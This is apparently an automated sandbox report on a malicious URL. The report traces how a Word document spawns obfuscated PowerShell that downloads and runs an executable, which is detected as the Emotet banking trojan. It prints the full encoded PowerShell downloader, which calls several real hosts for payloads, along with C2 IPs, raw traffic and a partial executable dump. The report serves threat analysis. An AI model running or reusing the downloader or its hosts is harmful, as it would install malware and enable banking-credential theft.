Analysis Report http://leonfurniturestore.com/sec.myacc.resourses.biz/

Overview

General Information

Joe Sandbox Version:	25.0.0 Tiger's Eye
Analysis ID:	785940
Start date:	12.02.2019
Start time:	20:11:38
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://leonfurniturestore.com/sec.myacc.resourses.biz/
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.expl.evad.win@14/23@3/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 53% (good quality ratio 42.2%) Quality average: 58.1% Quality standard deviation: 37.3%
HCA Information:	Successful, ratio: 87% Number of executed functions: 87 Number of non-executed functions: 189
Cookbook Comments:	Adjust boot time
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	80	0 - 100	Report FP / FN	false

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts1	Command-Line Interface1	Valid Accounts1	Valid Accounts1	Valid Accounts1	Credential Dumping	Process Discovery2	Application Deployment Software	Data from Local System	Data Encrypted2	Standard Cryptographic Protocol2
Replication Through Removable Media	Service Execution1	Modify Existing Service1	Process Injection1	Disabling Security Tools1	Network Sniffing	Security Software Discovery2	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Non-Application Layer Protocol4
Drive-by Compromise	PowerShell4	New Service2	New Service2	Process Injection1	Input Capture	Remote System Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Application Layer Protocol4
Exploit Public-Facing Application	Exploitation for Client Execution11	System Firmware	DLL Search Order Hijacking	Deobfuscate/Decode Files or Information1	Credentials in Files	System Service Discovery1	Logon Scripts	Input Capture	Data Encrypted	Multiband Communication
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Obfuscated Files or Information1	Account Manipulation	File and Directory Discovery1	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol
Spearphishing Attachment	Graphical User Interface	Modify Existing Service	New Service	DLL Search Order Hijacking	Brute Force	System Information Discovery22	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port

Signature Overview

Click to jump to signature section

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\user\810.exe	Code function: 7_2_00112089 CryptExportKey,	7_2_00112089
Source: C:\Users\user\810.exe	Code function: 7_2_001120E5 CryptAcquireContextW,	7_2_001120E5
Source: C:\Users\user\810.exe	Code function: 7_2_00112104 CryptReleaseContext,	7_2_00112104
Source: C:\Users\user\810.exe	Code function: 7_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,	7_2_00112125
Source: C:\Users\user\810.exe	Code function: 7_2_0011218B CryptGenKey,CryptDestroyKey,CryptReleaseContext,	7_2_0011218B
Source: C:\Users\user\810.exe	Code function: 7_2_001121A9 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	7_2_001121A9
Source: C:\Users\user\810.exe	Code function: 7_2_00112217 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,	7_2_00112217
Source: C:\Users\user\810.exe	Code function: 7_2_00112292 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,	7_2_00112292
Source: C:\Users\user\810.exe	Code function: 7_2_0011233E RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptDestroyHash,GetProcessHeap,HeapFree,	7_2_0011233E
Source: C:\Users\user\810.exe	Code function: 7_2_001123B0 CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,	7_2_001123B0
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_001120E5 CryptAcquireContextW,	9_2_001120E5
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_00112104 CryptDecodeObjectEx,CryptReleaseContext,	9_2_00112104
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_00112089 CryptExportKey,	9_2_00112089
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,	9_2_00112125
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_0011218B CryptGenKey,CryptDestroyKey,CryptReleaseContext,	9_2_0011218B
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_001121A9 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	9_2_001121A9
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_00112217 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,	9_2_00112217
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_00112292 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,	9_2_00112292
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_0011233E RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptDestroyHash,GetProcessHeap,HeapFree,	9_2_0011233E
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_001123B0 CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,	9_2_001123B0

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Jump to behavior

Potential browser exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Jump to behavior

Networking:

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknown	TCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknown	TCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknown	TCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknown	TCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknown	TCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknown	TCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknown	TCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknown	TCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknown	TCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknown	TCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknown	TCP traffic detected without corresponding DNS query: 181.15.224.57

HTTP GET or POST without a user agent

Show sources

Source: global traffic	HTTP traffic detected: GET /9onrkqJ HTTP/1.1Host: borsacat.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /9onrkqJ/ HTTP/1.1Host: borsacat.com

Contains functionality to download additional files from the internet

Show sources

Source: C:\Windows\System32\startedradar.exe

Code function: 9_2_00111679 HttpQueryInfoW,GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,

9_2_00111679

Downloads files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /sec.myacc.resourses.biz/ HTTP/1.1Accept: text/html, application/xhtml+xml, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: leonfurniturestore.comDNT: 1Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /9onrkqJ HTTP/1.1Host: borsacat.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /9onrkqJ/ HTTP/1.1Host: borsacat.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cookie: 55193=HoTC9DGe9+F8n6zBTTuy+GWHm63lQSxcmAlGva3Kao04L64CnsGpcFMQIpsoIeOaWtHQuDMyxaXSDx1wPhNwdOm3OEfCNoSKj9RgMXnR3WTr+QwWzfnMGmbSg9hdXtbVDOmnf7WTrIDGPrSXQxJgUyScIjhAKBaaJC/11D+B+Y9jm379ECkn78pv6/zOXqZ/1oYa+5OLkVkU0lqyuBaiY2a0PDmNKWybkJPv7DhC/8qnKqUOrKKvCbTJSTXugxvsqoGHX7vUeSuyFaVfDTThr6ToCd9mmlS6Gy1PvZJKfMunlupwXJ6GASeAuCeUy3/pD2ez2xZDOO2P87McYuTRMr1S6bl7OkfQ6fVVO8nAG8pOfMuJI9zARL54B7LfNoaZx5LhOl4RV0Qi/6mrfmVbSz+HX5hnU66i8oLMzRBbcmbJAfpeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 181.15.224.57Connection: Keep-AliveCache-Control: no-cache

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: leonfurniturestore.com

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Feb 2019 19:13:02 GMTServer: ApacheX-Powered-By: PHP/5.6.37Expires: Tue, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0Pragma: no-cacheContent-Disposition: attachment; filename="lmZBvQit.exe"Content-Transfer-Encoding: binaryLast-Modified: Tue, 12 Feb 2019 19:13:02 GMTVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: application/octet-streamData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 9c a8 14 9e fd c6 47 9e fd c6 47 9e fd c6 47 97 85 55 47 91 fd c6 47 9e fd c7 47 86 fd c6 47 9e fd c6 47 9f fd c6 47 93 af 1d

Urls found in memory or binary data

Show sources

Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://borsacat.H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://borsacat.cH
Source: powershell.exe, 00000004.00000002.1667350886.01F78000.00000004.sdmp	String found in binary or memory: http://borsacat.com
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://borsacat.com/9onrH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://borsacat.com/9onrkqH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp, powershell.exe, 00000004.00000002.1665256686.00215000.00000004.sdmp	String found in binary or memory: http://borsacat.com/9onrkqJ
Source: powershell.exe, 00000004.00000002.1667350886.01F78000.00000004.sdmp	String found in binary or memory: http://borsacat.com/9onrkqJ/H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://borsacat.com/9onrkqJH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://borsacat.comh%
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://chileven.com/YAsyH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://chileven.com/YAsyS0Mslz
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://chileven.com/YAsyS0MslzH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://chileven.com/YAsySH
Source: 77EC63BDA74BD0D0E0426DC8F8008506.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://fatrecipesdoc.com/I20cH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://fatrecipesdoc.com/I20clH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://fatrecipesdoc.com/I20clMx8
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://fatrecipesdoc.com/I20clMx8H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://huyushop.com/P2ryBfybD
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://huyushop.com/P2ryBfybDH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://huyushop.comH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://idjvn.H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://idjvn.com/eUBrJH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://idjvn.com/eUBrJig7
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	String found in binary or memory: http://idjvn.com/eUH
Source: sec.myacc.resourses[1].htm.1.dr	String found in binary or memory: https://www.leonfurniturestore.com/sec.myacc.resourses.biz/

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 443

E-Banking Fraud:

Detected Emotet e-Banking trojan

Show sources

Source: C:\Users\user\810.exe	Code function: 7_2_0011CF86		7_2_0011CF86
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_0011CF86		9_2_0011CF86

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Users\user\810.exe	Code function: 7_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,		7_2_00112125
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,		9_2_00112125

System Summary:

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 185.2.4.75 80

Jump to behavior

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\810.exe

Jump to dropped file

Contains functionality to call native functions

Show sources

Source: C:\Users\user\810.exe	Code function: 6_2_003E21B8 NtAllocateVirtualMemory,	6_2_003E21B8
Source: C:\Users\user\810.exe	Code function: 6_2_003E20FD NtProtectVirtualMemory,	6_2_003E20FD
Source: C:\Users\user\810.exe	Code function: 7_2_000F21B8 NtAllocateVirtualMemory,	7_2_000F21B8
Source: C:\Users\user\810.exe	Code function: 7_2_000F20FD NtProtectVirtualMemory,	7_2_000F20FD
Source: C:\Windows\System32\startedradar.exe	Code function: 8_2_002821B8 NtAllocateVirtualMemory,	8_2_002821B8
Source: C:\Windows\System32\startedradar.exe	Code function: 8_2_002820FD NtProtectVirtualMemory,	8_2_002820FD
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_000F21B8 NtAllocateVirtualMemory,	9_2_000F21B8
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_000F20FD NtProtectVirtualMemory,	9_2_000F20FD

Contains functionality to delete services

Show sources

Source: C:\Users\user\810.exe

Code function: 7_2_0011FD10 _snwprintf,GetProcessHeap,HeapFree,OpenServiceW,DeleteService,CloseServiceHandle,

7_2_0011FD10

Contains functionality to launch a process as a different user

Show sources

Source: C:\Users\user\810.exe

Code function: 7_2_00111F72 CreateProcessAsUserW,

7_2_00111F72

Creates mutexes

Show sources

Source: C:\Windows\System32\startedradar.exe	Mutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\startedradar.exe	Mutant created: \BaseNamedObjects\PEMEC8
Source: C:\Users\user\810.exe	Mutant created: \Sessions\2\BaseNamedObjects\PEMD40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\startedradar.exe	Mutant created: \BaseNamedObjects\PEM198
Source: C:\Users\user\810.exe	Mutant created: \Sessions\2\BaseNamedObjects\PEM5E8
Source: C:\Users\user\810.exe	Mutant created: \Sessions\2\BaseNamedObjects\Global\M3C4E0000
Source: C:\Users\user\810.exe	Mutant created: \Sessions\2\BaseNamedObjects\Global\I3C4E0000

Detected potential crypto function

Show sources

Source: C:\Users\user\810.exe	Code function: 6_2_00D03535	6_2_00D03535
Source: C:\Users\user\810.exe	Code function: 6_2_004053DF	6_2_004053DF
Source: C:\Users\user\810.exe	Code function: 6_2_004053DF	6_2_004053DF
Source: C:\Users\user\810.exe	Code function: 6_1_00D03535	6_1_00D03535
Source: C:\Users\user\810.exe	Code function: 7_2_001153DF	7_2_001153DF
Source: C:\Users\user\810.exe	Code function: 7_2_001153DF	7_2_001153DF
Source: C:\Windows\System32\startedradar.exe	Code function: 8_2_002A53DF	8_2_002A53DF
Source: C:\Windows\System32\startedradar.exe	Code function: 8_2_002A53DF	8_2_002A53DF
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_001153DF	9_2_001153DF
Source: C:\Windows\System32\startedradar.exe	Code function: 9_2_001153DF	9_2_001153DF

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\startedradar.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\startedradar.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal80.bank.expl.evad.win@14/23@3/4

Contains functionality to create services

Show sources

Source: C:\Users\user\810.exe	Code function: _snwprintf,GetProcessHeap,HeapFree,CreateServiceW,CloseServiceHandle,		7_2_0011FDC9
Source: C:\Windows\System32\startedradar.exe	Code function: _snwprintf,GetProcessHeap,HeapFree,CreateServiceW,CloseServiceHandle,		9_2_0011FDC9

Contains functionality to enum processes or threads

Show sources

Source: C:\Users\user\810.exe

Code function: 6_2_00401BF0 CreateToolhelp32Snapshot,

6_2_00401BF0

Contains functionality to modify services (start/stop/modify)

Show sources

Source: C:\Users\user\810.exe

Code function: 7_2_0011FE54 ChangeServiceConfig2W,GetProcessHeap,HeapFree,

7_2_0011FE54

Creates files inside the user directory

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\History\Low

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\user~1\AppData\Local\Temp\~DFEA1CECCC785180E5.TMP

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Reads ini files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2320 CREDAT:275457 /prefetch:2
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ
Source: unknown	Process created: C:\Users\user\810.exe 'C:\Users\user\810.exe'
Source: unknown	Process created: C:\Users\user\810.exe C:\Users\user\810.exe
Source: unknown	Process created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe
Source: unknown	Process created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2320 CREDAT:275457 /prefetch:2	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\810.exe 'C:\Users\user\810.exe'	Jump to behavior
Source: C:\Users\user\810.exe	Process created: C:\Users\user\810.exe C:\Users\user\810.exe	Jump to behavior
Source: C:\Windows\System32\startedradar.exe	Process created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: l5gXiD5DD2Qlu5.pdb source: 810.exe.4.dr
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1668557236.03EB0000.00000002.sdmp

Data Obfuscation:

PowerShell case anomaly found

Show sources

